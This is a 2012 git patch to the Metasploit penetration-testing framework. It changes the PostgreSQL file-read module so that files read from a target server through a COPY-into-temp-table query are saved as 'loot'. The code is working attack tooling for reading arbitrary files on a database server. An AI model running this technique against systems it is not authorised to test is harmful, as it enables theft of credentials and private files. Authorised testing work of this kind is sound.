From 22601180f3a4f07a131d953be214022acd475180 Mon Sep 17 00:00:00 2001 From: James Lee Date: Wed, 23 May 2012 18:07:13 -0600 Subject: [PATCH] Save the pilfered file as loot --- lib/msf/core/exploit/postgres.rb | 2 +- modules/auxiliary/admin/postgres/postgres_readfile.rb | 9 +++++++++ 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index af68deb53f..decd9946d1 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -263,7 +263,7 @@ module Exploit::Remote::Postgres read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT); COPY #{temp_table_name} FROM '#{filename}'; SELECT * FROM #{temp_table_name}} - read_return = postgres_query(read_query,true) + read_return = postgres_query(read_query) end def postgres_has_database_privilege(priv) diff --git a/modules/auxiliary/admin/postgres/postgres_readfile.rb b/modules/auxiliary/admin/postgres/postgres_readfile.rb index a0d40cff7b..bcccfa6b75 100644 --- a/modules/auxiliary/admin/postgres/postgres_readfile.rb +++ b/modules/auxiliary/admin/postgres/postgres_readfile.rb @@ -15,6 +15,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Postgres + include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, @@ -67,6 +68,14 @@ class Metasploit3 < Msf::Auxiliary print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}" end when :complete + loot = '' + ret[:complete].rows.each { |row| + print_line(row.first) + loot << row.first + } + # No idea what the actual ctype will be, text/plain is just a guess + path = store_loot('postgres.file', 'text/plain', rhost, loot, datastore['RFILE']) + print_status("#{rhost}:#{rport} Postgres - #{datastore['RFILE']} saved in #{path}") vprint_good "#{rhost}:#{rport} Postgres - Command complete." end postgres_logout if self.postgres_conn